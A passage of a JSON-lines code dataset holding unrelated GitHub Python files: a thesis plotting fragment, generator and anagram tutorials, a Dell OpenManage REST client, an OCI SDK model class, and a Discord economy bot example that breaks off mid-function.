y_train[:,2])\n\t\n\tprint(\"Making the intersection plot\")\n\tplotIntersections(LRNNZBb, None, x_train, x_train, figPath)\n\n\tprint(\"Making the regressions plot\")\n\tplotRegressions(LRNNZBb, x_train_size_b, x_train, x_train, y_train[:,0], y_train[:,1], y_train[:,2], figPath)\n\n\tpredList = []\n\tpredList.append(fold_pred_algo_a)\n\tpredList.append(fold_pred_algo_b)\n\tpredList.append(fold_best_algo)\n\n\t\n\n\tmodel_names = []\n\tmodel_names.append('LRNNZBa')\n\tmodel_names.append('LRNNZBb')\n\tmodel_names.append('GT')\n\tplot_per_b_size_folds(predList, list_folds, list_folds_size_b, time_per_fold, model_names, figPath+\"/LRNNZB_\")","repo_name":"Gael-di-raimo/MasterThesis","sub_path":"LRNNZB.py","file_name":"LRNNZB.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4384354367","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ hsz\n\n\"\"\"\n生成器函数: 函数里只要有yield 关键字\n\n生成器函数的实现\n\n\"\"\"\n\n\ndef gen_func():\n yield 1\n\n\n# 惰性求值和延迟求值提供了可能\n\n\ndef fib(index):\n \"\"\"\n 斐波那契\n :param index:\n :return:\n \"\"\"\n if index <= 2:\n return 1\n else:\n return fib(index - 1) + fib(index - 2)\n\n\n\ndef fib2(index):\n \"\"\"\n 斐波那契的实现过程\n :param index:\n :return:\n \"\"\"\n re_list = []\n n, a, b = 0, 0, 1\n while n < index:\n re_list.append(b)\n a, b = b, a + b\n n += 1\n return re_list\n\n\ndef fib_gen(index):\n \"\"\"\n 使用生成器 斐波那契的实现过程\n :param index:\n :return:\n \"\"\"\n n, a, b = 0, 0, 1\n while n < index:\n yield b\n a, b = b, a + b\n n += 1\n\n\ndef func():\n return 
1\n\n\nif __name__ == \"__main__\":\n # 返回生成器对象:python 编译字节码的时候就产生了\n gen = gen_func()\n print(gen)\n for value in gen:\n print(value)\n\n re = func()\n print(re)\n\n print(fib2(10))\n\n for value in fib_gen(10):\n print(value)\n","repo_name":"Thousandhack/reading_notes_python","sub_path":"advanced_python/035_gen_func.py","file_name":"035_gen_func.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12915756619","text":"from __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nimport json\nfrom ansible.module_utils.urls import open_url, ConnectionError, SSLValidationError\nfrom ansible.module_utils.six.moves.urllib.error import URLError, HTTPError\nfrom ansible.module_utils.six.moves.urllib.parse import urlencode\n\nSESSION_RESOURCE_COLLECTION = {\n \"SESSION\": \"SessionService/Sessions\",\n \"SESSION_ID\": \"SessionService/Sessions('{Id}')\",\n}\n\n\nclass OpenURLResponse(object):\n \"\"\"Handles HTTPResponse\"\"\"\n\n def __init__(self, resp):\n self.body = None\n self.resp = resp\n if self.resp:\n self.body = self.resp.read()\n\n @property\n def json_data(self):\n try:\n return json.loads(self.body)\n except ValueError:\n raise ValueError(\"Unable to parse json\")\n\n @property\n def status_code(self):\n return self.resp.getcode()\n\n @property\n def success(self):\n return self.status_code in (200, 201, 202, 204)\n\n @property\n def token_header(self):\n return self.resp.headers.get('X-Auth-Token')\n\n\nclass RestOME(object):\n \"\"\"Handles OME API requests\"\"\"\n\n def __init__(self, module_params=None, req_session=False):\n self.module_params = module_params\n self.hostname = self.module_params[\"hostname\"]\n self.username = self.module_params[\"username\"]\n self.password = self.module_params[\"password\"]\n self.port = self.module_params[\"port\"]\n self.req_session = req_session\n self.session_id = None\n self.protocol = 'https'\n self._headers = {'Content-Type': 'application/json', 'Accept': 'application/json'}\n\n def _get_base_url(self):\n \"\"\"builds base url\"\"\"\n return '{0}://{1}:{2}/api'.format(self.protocol, self.hostname, self.port)\n\n def _build_url(self, path, query_param=None):\n \"\"\"builds complete url\"\"\"\n url = path\n base_uri = self._get_base_url()\n if path:\n url = '{0}/{1}'.format(base_uri, path)\n if query_param:\n \"\"\"Ome filtering does not work as expected when '+' is passed,\n urlencode will encode spaces as '+' so replace it to '%20'\"\"\"\n url += \"?{0}\".format(urlencode(query_param).replace('+', '%20'))\n return url\n\n def _url_common_args_spec(self, method, api_timeout, headers=None):\n \"\"\"Creates an argument common spec\"\"\"\n req_header = self._headers\n if headers:\n req_header.update(headers)\n url_kwargs = {\n \"method\": method,\n \"validate_certs\": False,\n \"use_proxy\": True,\n \"headers\": req_header,\n \"timeout\": api_timeout,\n \"follow_redirects\": 'all',\n }\n return url_kwargs\n\n def _args_without_session(self, method, api_timeout=30, headers=None):\n \"\"\"Creates an argument spec in case of basic authentication\"\"\"\n req_header = self._headers\n if headers:\n req_header.update(headers)\n url_kwargs = self._url_common_args_spec(method, api_timeout, headers=headers)\n url_kwargs[\"url_username\"] = self.username\n url_kwargs[\"url_password\"] = self.password\n url_kwargs[\"force_basic_auth\"] = True\n return url_kwargs\n\n def _args_with_session(self, method, api_timeout=30, 
headers=None):\n \"\"\"Creates an argument spec, in case of authentication with session\"\"\"\n url_kwargs = self._url_common_args_spec(method, api_timeout, headers=headers)\n url_kwargs[\"force_basic_auth\"] = False\n return url_kwargs\n\n def invoke_request(self, method, path, data=None, query_param=None, headers=None,\n api_timeout=30, dump=True):\n \"\"\"\n Sends a request through open_url\n Returns :class:`OpenURLResponse` object.\n :arg method: HTTP verb to use for the request\n :arg path: path to request without query parameter\n :arg data: (optional) Payload to send with the request\n :arg query_param: (optional) Dictionary of query parameter to send with request\n :arg headers: (optional) Dictionary of HTTP Headers to send with the\n request\n :arg api_timeout: (optional) How long to wait for the server to send\n data before giving up\n :arg dump: (Optional) boolean value for dumping payload data.\n :returns: OpenURLResponse\n \"\"\"\n try:\n if 'X-Auth-Token' in self._headers:\n url_kwargs = self._args_with_session(method, api_timeout, headers=headers)\n else:\n url_kwargs = self._args_without_session(method, api_timeout, headers=headers)\n if data and dump:\n data = json.dumps(data)\n url = self._build_url(path, query_param=query_param)\n resp = open_url(url, data=data, **url_kwargs)\n resp_data = OpenURLResponse(resp)\n except (HTTPError, URLError, SSLValidationError, ConnectionError) as err:\n raise err\n return resp_data\n\n def __enter__(self):\n \"\"\"Creates sessions by passing it to header\"\"\"\n if self.req_session:\n payload = {'UserName': self.username,\n 'Password': self.password,\n 'SessionType': 'API', }\n path = SESSION_RESOURCE_COLLECTION[\"SESSION\"]\n resp = self.invoke_request('POST', path, data=payload)\n if resp and resp.success:\n self.session_id = resp.json_data.get(\"Id\")\n self._headers[\"X-Auth-Token\"] = resp.token_header\n else:\n msg = \"Could not create the session\"\n raise ConnectionError(msg)\n return self\n\n def __exit__(self, exc_type, exc_value, traceback):\n \"\"\"Deletes a session id, which is in use for request\"\"\"\n if self.session_id:\n path = SESSION_RESOURCE_COLLECTION[\"SESSION_ID\"].format(Id=self.session_id)\n self.invoke_request('DELETE', path)\n return False\n\n def get_all_report_details(self, uri):\n \"\"\"\n This implementation mainly dependent on '@odata.count' value.\n Currently first request without query string, always returns total number of available\n reports in '@odata.count'.\n \"\"\"\n try:\n resp = self.invoke_request('GET', uri)\n data = resp.json_data\n report_list = data[\"value\"]\n total_count = data['@odata.count']\n remaining_count = total_count - len(report_list)\n first_page_count = len(report_list)\n while remaining_count > 0:\n resp = self.invoke_request('GET', uri, query_param={\"$top\": first_page_count, \"$skip\": len(report_list)})\n data = resp.json_data\n value = data[\"value\"]\n report_list.extend(value)\n remaining_count = remaining_count - len(value)\n return {\"resp_obj\": resp, \"report_list\": report_list}\n except (URLError, HTTPError, SSLValidationError, ConnectionError, TypeError, ValueError) as err:\n raise err\n\n def get_job_type_id(self, jobtype_name):\n \"\"\"This provides an ID of the job type.\"\"\"\n job_type_id = None\n resp = self.invoke_request('GET', \"JobService/JobTypes\")\n data = resp.json_data[\"value\"]\n for each in data:\n if each[\"Name\"] == jobtype_name:\n job_type_id = each[\"Id\"]\n break\n return job_type_id\n\n def get_device_id_from_service_tag(self, 
service_tag):\n \"\"\"\n :param service_tag: service tag of the device\n :return: dict\n Id: int: device id\n value: dict: device id details\n not_found_msg: str: message if service tag not found\n \"\"\"\n device_id = None\n query = \"DeviceServiceTag eq '{0}'\".format(service_tag)\n response = self.invoke_request(\"GET\", \"DeviceService/Devices\", query_param={\"$filter\": query})\n value = response.json_data.get(\"value\", [])\n device_info = {}\n if value:\n device_info = value[0]\n device_id = device_info[\"Id\"]\n return {\"Id\": device_id, \"value\": device_info}\n\n def get_all_items_with_pagination(self, uri):\n \"\"\"\n This implementation mainly to get all available items from ome for pagination\n supported GET uri\n :param uri: uri which supports pagination\n :return: dict.\n \"\"\"\n try:\n resp = self.invoke_request('GET', uri)\n data = resp.json_data\n total_items = data.get(\"value\", [])\n total_count = data.get('@odata.count', 0)\n next_link = data.get('@odata.nextLink', \"\")\n while next_link:\n # request the next page and advance the nextLink marker so the loop terminates\n resp = self.invoke_request('GET', uri, query_param={\"$top\": total_count - len(total_items), \"$skip\": len(total_items)})\n data = resp.json_data\n value = data[\"value\"]\n total_items.extend(value)\n next_link = data.get('@odata.nextLink', \"\")\n return {\"total_count\": total_count, \"value\": total_items}\n except (URLError, HTTPError, SSLValidationError, ConnectionError, TypeError, ValueError) as err:\n raise err\n\n def get_device_type(self):\n \"\"\"\n Returns device type map where as key is type and value is type name\n eg: {1000: \"SERVER\", 2000: \"CHASSIS\", 4000: \"NETWORK_IOM\", \"8000\": \"STORAGE_IOM\", 3000: \"STORAGE\"}\n :return: dict, first item dict gives device type map\n \"\"\"\n device_map = {}\n response = self.invoke_request(\"GET\", \"DeviceService/DeviceType\")\n if response.json_data.get(\"value\"):\n device_map = dict([(item[\"DeviceType\"], item[\"Name\"]) for item in response.json_data[\"value\"]])\n return device_map\n","repo_name":"varungarg26/monitor-me","sub_path":"venv/lib/python3.9/site-packages/ansible_collections/dellemc/openmanage/plugins/module_utils/ome.py","file_name":"ome.py","file_ext":"py","file_size_in_byte":9724,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31605865679","text":"from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass PurgeWebAppAccelerationCacheDetails(object):\n \"\"\"\n Specifies options for a cache purge.\n \"\"\"\n\n #: A constant which can be used with the purge_type property of a PurgeWebAppAccelerationCacheDetails.\n #: This constant has a value of \"ENTIRE_CACHE\"\n PURGE_TYPE_ENTIRE_CACHE = \"ENTIRE_CACHE\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new PurgeWebAppAccelerationCacheDetails object with values from keyword arguments. 
This class has the following subclasses and if you are using this class as input\n to a service operations then you should favor using a subclass over the base class:\n\n * :class:`~oci.waa.models.PurgeEntireWebAppAccelerationCacheDetails`\n\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param purge_type:\n The value to assign to the purge_type property of this PurgeWebAppAccelerationCacheDetails.\n Allowed values for this property are: \"ENTIRE_CACHE\"\n :type purge_type: str\n\n \"\"\"\n self.swagger_types = {\n 'purge_type': 'str'\n }\n\n self.attribute_map = {\n 'purge_type': 'purgeType'\n }\n\n self._purge_type = None\n\n @staticmethod\n def get_subtype(object_dictionary):\n \"\"\"\n Given the hash representation of a subtype of this class,\n use the info in the hash to return the class of the subtype.\n \"\"\"\n type = object_dictionary['purgeType']\n\n if type == 'ENTIRE_CACHE':\n return 'PurgeEntireWebAppAccelerationCacheDetails'\n else:\n return 'PurgeWebAppAccelerationCacheDetails'\n\n @property\n def purge_type(self):\n \"\"\"\n **[Required]** Gets the purge_type of this PurgeWebAppAccelerationCacheDetails.\n Type of cache purge to perform.\n\n Allowed values for this property are: \"ENTIRE_CACHE\"\n\n\n :return: The purge_type of this PurgeWebAppAccelerationCacheDetails.\n :rtype: str\n \"\"\"\n return self._purge_type\n\n @purge_type.setter\n def purge_type(self, purge_type):\n \"\"\"\n Sets the purge_type of this PurgeWebAppAccelerationCacheDetails.\n Type of cache purge to perform.\n\n\n :param purge_type: The purge_type of this PurgeWebAppAccelerationCacheDetails.\n :type: str\n \"\"\"\n allowed_values = [\"ENTIRE_CACHE\"]\n if not value_allowed_none_or_none_sentinel(purge_type, allowed_values):\n raise ValueError(\n f\"Invalid value for `purge_type`, must be None or one of {allowed_values}\"\n )\n self._purge_type = purge_type\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n","repo_name":"oracle/oci-python-sdk","sub_path":"src/oci/waa/models/purge_web_app_acceleration_cache_details.py","file_name":"purge_web_app_acceleration_cache_details.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":345,"dataset":"github-code","pt":"52"} +{"seq_id":"4382630077","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ hsz\n\n\"\"\"\n所谓“变位词”是指两个词之间存在组成字母的重新排列关系\n\"\"\"\n\n\"\"\"\n解决方式一:逐字检查\n解法思路\n将词1 中的字符逐个到词2 中检��是否存在\n存在就 “ 打勾 ” 标记(防止重复检查)\n如果每个字符都能找到,则两个词是变位词,\n只要有1个字符找不到,就不是变位词。\n\"\"\"\n\n\ndef anagram_solution(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_two = list(str_two)\n pos_one = 0\n still = True\n while pos_one < len(str_one) and still:\n pos_two = 0\n found = False\n while pos_two < len(list_two) and not found:\n if str_one[pos_one] == list_two[pos_two]:\n found = True\n else:\n pos_two = pos_two + 1\n if found:\n list_two[pos_two] = None\n else:\n still = False\n pos_one = pos_one + 1\n return still\n\n\n\"\"\"\n解决方法二:排序比较\n两个sort并不是无代价的\n本算法的运行时间数量级就等于排序过程\n的数量级O(n log n)\n\"\"\"\n\n\ndef anagram_solution_two(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_one = list(str_one)\n list_one.sort()\n list_two = list(str_two)\n list_two.sort()\n pos = 0\n still = True\n while pos < len(str_one) and still:\n if 
list_one[pos] == list_two[pos]:\n pos += 1\n else:\n still = False\n\n return still\n\n\n\"\"\"\n解法4:计数比较-算法分析\n❖解题思路:对比两个词中每个字母出现的\n次数,如果26个字母出现的次数都相同的\n话,这两个字符串就一定是变位词\n❖具体做法:为每个词设置一个26位的计数\n器,先检查每个词,在计数器中设定好每\n个字母出现的次数\n❖计数完成后,进入比较阶段,看两个字符\n串的计数器是否相同,如果相同则输出是\n变位词的结论\n\n\n值得注意的是,本算法依赖于两个长度为\n26的计数器列表,来保存字符计数,这相\n比前3个算法需要更多的存储空间\n如果考虑由大字符集构成的词(如中文具有上万\n不同字符),还会需要更多存储空间。\n\"\"\"\n\n\ndef anagram_solution_three(str_one, str_two):\n if len(str_one) != len(str_two):\n return False\n list_one = [0] * 26\n list_two = [0] * 26\n for i in range(len(str_one)):\n pos = ord(str_one[i]) - ord('a')\n list_one[pos] = list_one[pos] + 1\n\n for i in range(len(str_two)):\n pos = ord(str_two[i]) - ord('a')\n list_two[pos] = list_two[pos] + 1\n j = 0\n still = True\n while j < 26 and still:\n if list_one[j] == list_two[j]:\n j += 1\n else:\n still = False\n return still\n\n\nif __name__ == \"__main__\":\n print(\"=========法一=======================================\")\n print(anagram_solution('abcd32', 'acbd32'))\n print(anagram_solution('abcd322', 'acbd323'))\n print(\"=========法二=======================================\")\n print(anagram_solution_two('abcd32', 'acbd32'))\n print(anagram_solution_two('abcd322', 'acbd323'))\n print(\"=========法三=======条件仅限于小写字母==============\")\n print(anagram_solution_three('abcdgd', 'acbdgd'))\n print(anagram_solution_three('abcdhz', 'acbdha'))\n","repo_name":"Thousandhack/algorithms_training","sub_path":"data_structure/anagram_solution.py","file_name":"anagram_solution.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37661249447","text":"import asyncio\r\nimport random\r\nimport typing\r\n\r\nimport discord\r\nfrom discord import app_commands\r\n\r\nfrom DiscordEconomy.Sqlite import Economy\r\n# or if you want to use mongodb\r\n# from DiscordEconomy.MongoDB import Economy\r\n\r\n\r\n# Pass here token as string and guild id where to register slash commands\r\n\r\nGUILD_ID = 1234567890\r\nTEST_GUILD = discord.Object(id=GUILD_ID)\r\nBOT_TOKEN = \"\"\r\nUSER_COOLDOWNS = {}\r\n\r\n\r\n\r\ndef is_registered():\r\n async def predicate(interaction: discord.Interaction):\r\n r = await economy.is_registered(interaction.user.id)\r\n return r\r\n\r\n return app_commands.check(predicate)\r\n\r\n\r\ndef cooldown(when: typing.Union[int, float]):\r\n async def __handle_cooldown(when: typing.Union[int, float], interaction: discord.Interaction):\r\n USER_COOLDOWNS[interaction.user.id] = when\r\n await asyncio.sleep(when)\r\n USER_COOLDOWNS.pop(interaction.user.id)\r\n\r\n async def predicate(interaction: discord.Interaction):\r\n if interaction.user.id in USER_COOLDOWNS:\r\n raise app_commands.AppCommandError(\"User is on cooldown\")\r\n\r\n asyncio.ensure_future(__handle_cooldown(when, interaction))\r\n\r\n return True\r\n\r\n return app_commands.check(predicate)\r\n\r\n\r\nitems_list = {\r\n \"Items\": {\r\n \"crystal\": {\r\n \"available\": True,\r\n \"price\": 300,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"fishing rod\": {\r\n \"available\": True,\r\n \"price\": 1200,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"pickaxe\": {\r\n \"available\": True,\r\n \"price\": 1500,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"sword\": {\r\n \"available\": True,\r\n \"price\": 700,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"dorayaki\": {\r\n \"available\": True,\r\n \"price\": 
12500,\r\n \"description\": \"Provide description for item here\"\r\n },\r\n \"pancake\": {\r\n \"available\": True,\r\n \"price\": 10000,\r\n \"description\": \"Provide description for item here\"\r\n }\r\n }}\r\n\r\n\r\nclass DiscordEconomyClient(discord.Client):\r\n def __init__(self):\r\n intents = discord.Intents.default()\r\n intents.members = True\r\n\r\n self.is_synced = False\r\n\r\n super().__init__(intents=intents)\r\n\r\n async def on_ready(self):\r\n await self.wait_until_ready()\r\n\r\n if not self.is_synced:\r\n print(\"Syncing application(/) commands\")\r\n await tree.sync(guild=TEST_GUILD)\r\n\r\n\r\n\r\nclass Shop(app_commands.Group):\r\n\r\n @app_commands.command(description=\"See the list of all available items.\")\r\n @is_registered()\r\n async def items(self, interaction: discord.Interaction):\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.set_author(name=\"Items\")\r\n for item in items_list[\"Items\"].items():\r\n\r\n if item[1][\"available\"]:\r\n embed.add_field(name=item[0].capitalize(), value=f\"\"\"Price: **{item[1]['price']}**\r\n Description: **{item[1]['description']}**\"\"\")\r\n\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n @app_commands.command(description=\"Buy an item!\")\r\n @is_registered()\r\n async def buy(self, interaction: discord.Interaction, *, item: str):\r\n\r\n _item = item.lower()\r\n _cache = []\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n for item in items_list[\"Items\"].items():\r\n if item[0] == _item:\r\n _cache.append(item[0])\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n if item[0] in r.items:\r\n embed.add_field(name=\"Error\", value=f\"You already have that item!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n return\r\n\r\n if r.bank >= item[1][\"price\"]:\r\n await economy.add_item(interaction.user.id, item[0])\r\n await economy.remove_money(interaction.user.id, \"bank\", item[1][\"price\"])\r\n\r\n embed.add_field(name=\"Success\", value=f\"Successfully bought **{item[0]}**!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n\r\n embed.add_field(name=\"Error\", value=f\"You don't have enought money to buy this item!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n break\r\n\r\n if len(_cache) <= 0:\r\n embed.add_field(name=\"Error\", value=\"Item with that name does not exists!\")\r\n await interaction.response.send_message(embed=embed)\r\n\r\n @app_commands.command(description=\"Sell an item from your inventory!\")\r\n @is_registered()\r\n async def sell(self, interaction: discord.Interaction, *, item: str):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n _item = item.lower()\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if _item in r.items:\r\n for item in items_list[\"Items\"].items():\r\n if item[0] == _item:\r\n item_prc = item[1][\"price\"] / 2\r\n\r\n await economy.add_money(interaction.user.id, \"bank\", item_prc)\r\n await 
economy.remove_item(interaction.user.id, item[0])\r\n\r\n embed.add_field(name=\"Success\", value=f\"Successfully sold **{item[0]}**!\")\r\n await interaction.response.send_message(embed=embed)\r\n break\r\n else:\r\n\r\n embed.add_field(name=\"Error\", value=f\"You don't have this item!\")\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\nclient = DiscordEconomyClient()\r\ntree = app_commands.CommandTree(client)\r\n\r\ntree.add_command(Shop(), guild=TEST_GUILD)\r\n\r\n\r\neconomy = Economy()\r\n# or if you want to use mongodb\r\n# economy = Economy(\"mongodb+srv://user:password@clusterIP/Database?retryWrites=true&w=majority\", database_name=\"Discord\")\r\n\r\n\r\n@tree.error\r\nasync def on_error(interaction: discord.Interaction, error: app_commands.AppCommandError):\r\n print(USER_COOLDOWNS)\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n embed.add_field(name=\"Error\", value=str(error))\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Check your balance.\")\r\n@is_registered()\r\nasync def balance(interaction: discord.Interaction, member: discord.Member = None):\r\n member = member or interaction.user\r\n\r\n await economy.is_registered(member.id)\r\n\r\n user_account = await economy.get_user(member.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.add_field(name=f\"{member.display_name}'s balance\", value=f\"\"\"Bank: **{user_account.bank}**\r\n Wallet: **{user_account.wallet}**\r\n Items: **{', '.join(user_account.items)}**\"\"\")\r\n\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Receive daily reward for some money.\")\r\n@is_registered()\r\n@cooldown(60)\r\nasync def reward(interaction: discord.Interaction):\r\n random_amount = random.randint(50, 150)\r\n await economy.add_money(interaction.user.id, \"wallet\", random_amount)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.add_field(name=f\"Reward\", value=f\"Successfully claimed reward!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Toss a coin.\")\r\n@is_registered()\r\nasync def coinflip(interaction: discord.Interaction, money: int, side: str):\r\n side = side.lower()\r\n random_arg = random.choice([\"tails\", \"heads\"])\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n if side == random_arg:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n\r\n embed.add_field(name=\"Coinflip\", value=f\"You won coinflip! - {random_arg}\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n else:\r\n await economy.remove_money(interaction.user.id, \"wallet\", money)\r\n\r\n embed.add_field(name=\"Coinflip\", value=f\"You lost coinflip! 
- {random_arg}\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n embed.add_field(name=\"Coinflip\", value=f\"You don't have enough money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Play some slots.\")\r\n@is_registered()\r\nasync def slots(interaction: discord.Interaction, money: int):\r\n random_slots_data = [None for _ in range(9)]\r\n i = 0\r\n for _ in random_slots_data:\r\n random_slots_data[i] = random.choice([\":tada:\", \":cookie:\", \":large_blue_diamond:\",\r\n \":money_with_wings:\", \":moneybag:\", \":cherries:\"])\r\n\r\n i += 1\r\n if i == len(random_slots_data):\r\n break\r\n\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n\r\n embed.add_field(name=\"Slots\", value=f\"\"\"{random_slots_data[0]} | {random_slots_data[1]} | {random_slots_data[2]}\r\n {random_slots_data[3]} | {random_slots_data[4]} | {random_slots_data[5]}\r\n {random_slots_data[6]} | {random_slots_data[7]} | {random_slots_data[8]}\r\n \"\"\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n if random_slots_data[3] == random_slots_data[4] and random_slots_data[5] == random_slots_data[3]:\r\n await economy.add_money(interaction.user.id, \"wallet\", money * 2)\r\n await interaction.followup.send(content=\"You won!\")\r\n\r\n else:\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n await interaction.followup.send(content=\"You lose!\")\r\n\r\n else:\r\n embed.add_field(name=\"Slots\", value=f\"You don't have enough money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Withdraw money from your account.\")\r\n@is_registered()\r\nasync def withdraw(interaction: discord.Interaction, money: int):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if r.bank >= money:\r\n await economy.add_money(interaction.user.id, \"wallet\", money)\r\n await economy.remove_money(interaction.user.id, \"bank\", money)\r\n\r\n embed.add_field(name=\"Withdraw\", value=f\"Successfully withdrawn {money} money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n else:\r\n\r\n embed.add_field(name=\"Withdraw\", value=f\"You don't have enough money to withdraw!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Deposit to your account.\")\r\n@is_registered()\r\nasync def deposit(interaction: discord.Interaction, money: int):\r\n r = await economy.get_user(interaction.user.id)\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n\r\n if not r.wallet >= money:\r\n 
embed.add_field(name=\"Deposit\", value=f\"You don't have enough money to deposit!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n return await interaction.response.send_message(embed=embed)\r\n\r\n await economy.add_money(interaction.user.id, \"bank\", money)\r\n await economy.remove_money(interaction.user.id, \"wallet\", money)\r\n\r\n embed.add_field(name=\"Deposit\", value=f\"Successfully deposited {money} money!\")\r\n embed.set_footer(text=f\"Invoked by {interaction.user.name}\",\r\n icon_url=interaction.user.avatar.url)\r\n await interaction.response.send_message(embed=embed)\r\n\r\n\r\n@tree.command(guild=TEST_GUILD, description=\"Play some horse racing.\")\r\n@is_registered()\r\nasync def horse_racing(interaction: discord.Interaction, money: int):\r\n user = await economy.get_user(interaction.user.id)\r\n\r\n if not user.bank >= money:\r\n return await interaction.response.send_message(content=\"You don't have enough money to play.\")\r\n\r\n author_path = [\":horse_racing:\", \":blue_square:\", \":blue_square:\", \":blue_square:\", \":blue_square:\",\r\n \":blue_square:\",\r\n \":blue_square:\", \":blue_square:\", \":blue_square:\", \":blue_square:\", \" :checkered_flag:\"]\r\n\r\n enemy_path = [\":horse_racing:\", \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\",\r\n \":red_square:\", \":red_square:\", \":red_square:\", \":red_square:\", \" :checkered_flag:\"]\r\n\r\n embed = discord.Embed(\r\n colour=discord.Color.from_rgb(244, 182, 89)\r\n )\r\n embed.set_author(name=\"Horse race\")\r\n embed.add_field(name=\"You:\", value=\"\".join(author_path), inline=False)\r\n embed.add_field(name=f\"Enemy:\", value=\"\".join(enemy_path),\r\n inline=False)\r\n\r\n await 